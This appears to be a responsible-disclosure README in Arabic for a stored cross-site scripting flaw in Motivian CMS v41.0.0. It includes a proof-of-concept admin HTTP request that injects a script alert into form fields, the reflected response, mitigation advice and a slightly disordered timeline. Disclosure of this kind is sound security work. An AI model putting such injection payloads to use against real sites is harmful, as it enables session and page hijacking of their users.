
يكشف هذا المستودع عن ثغرة أمنية تم اكتشافها في Motivian Content Management System v.41.0.0.
يكشف هذا المستودع عن ثغرة أمنية تم اكتشافها في نظام إدارة المحتوى Motivian الإصدار 41.0.0.
تم الإبلاغ عن هذه الثغرة للبائع وفقًا لممارسات الإفصاح المسؤول، وإلى MITRE، التي قامت بتعيين معرف CVE مؤقت. يتم نشر التفاصيل بعد انتهاء فترة الإفصاح البالغة 45 يومًا.
Marketing/Forms، Marketing/Offers، Content/Pagesثغرة البرمجة النصية عبر المواقع (XSS) في نظام إدارة المحتوى Motivian الإصدار 41.0.0 تسمح لمهاجم عن بعد بتنفيذ كود تعسفي عبر مكونات Marketing/Forms و Marketing/Offers و Content/Pages. تم استغلال الثغرة عن طريق حقن كود جافا سكريبت ضار في حقول مختلفة، بما في ذلك العنوان في Marketing/Form و Marketing/Offers، وحقل البرنامج النصي للرأس في Content/Pages
يمكن استغلال الثغرة عبر حقول مختلفة في مكونات متعددة. لأغراض التوضيح، يركز إثبات المفهوم التالي على سيناريو محدد:
Marketing/Forms وأنشئ عنصر نموذج جديد.فيما يلي النص الكامل لطلبات واستجابات HTTP المستخدمة لإظهار المشكلة:
POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
Host: [REDACTED]
Content-Length: 1362
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=¤tPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]
HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Feb 2025 12:00:09 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 94593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10"> </td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd"> </td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/HEAD/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]
قم بتطهير جميع مدخلات المستخدم وهروب المخرجات قبل العرض. قم بتطبيق رأس سياسة أمان المحتوى (CSP) للتخفيف من مخاطر XSS.
| Date | Action |
|---|---|
| 2025-02-06 | طلب معرف CVE (CNA: MITRE) |
| 2025-04-02 | تعيين معرف CVE |
اكتشف وأفصح عنها بمسؤولية:
Francesco Marcuccio
مستشار أمن سيبراني، مختبر اختراق
إسناد مكتشف MITRE مدرج باسم:
Francesco Marcuccio
مستشار أمن سيبراني، مختبر اختراق
معرف CVE هذا في حالة منشور رسميًا. سيتم تحديثه بدرجة CVSS من قبل NIST بعد التحليل.
| 2025-04-07 | تم الإبلاغ عن الثغرات للبائع |
| 2025-05-31 | الإفصاح العام بعد انتهاء فترة الإفصاح البالغة 45 يومًا (إجمالي 54 يومًا) |
| 2025-06-04 | التسجيل الرسمي والإدخال في قاعدة بيانات MITRE وبوابة NIST/NVD |